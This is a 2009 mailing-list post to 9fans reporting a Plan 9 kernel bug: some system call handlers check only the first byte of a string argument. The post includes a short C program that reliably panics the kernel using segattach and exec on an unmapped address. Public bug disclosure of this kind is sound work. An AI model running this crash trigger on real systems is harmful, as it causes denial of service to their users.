From mboxrd@z Thu Jan  1 00:00:00 1970
Date: Sat,  1 Aug 2009 17:01:26 -0400
From: Elizabeth Jones <elly1@andrew.cmu.edu>
To: 9fans@9fans.net
Message-ID: <Pine.LNX.4.64-044.0908011700100.6538@unix10.andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Subject: [9fans] Kernel crash bug
Topicbox-Message-UUID: 34780e4e-ead5-11e9-9d60-3106f5b1d025

There exist crash bugs in some of the system call handlers to do with
string validation; sometimes, only the first byte of an argument string is
validated. The following program reliably causes a kernel panic for me:

#include <u.h>
#include <libc.h>

#define SEGBASE (char*)0x40000000
#define SEGSIZE 4096

int main() {
     segattach(0, "shared", SEGBASE, SEGSIZE);
     *(char*)(SEGBASE + SEGSIZE - 1) = 'a';
     exec((char*)SEGBASE + SEGSIZE - 1, nil);
     return 0;
}

-- Elly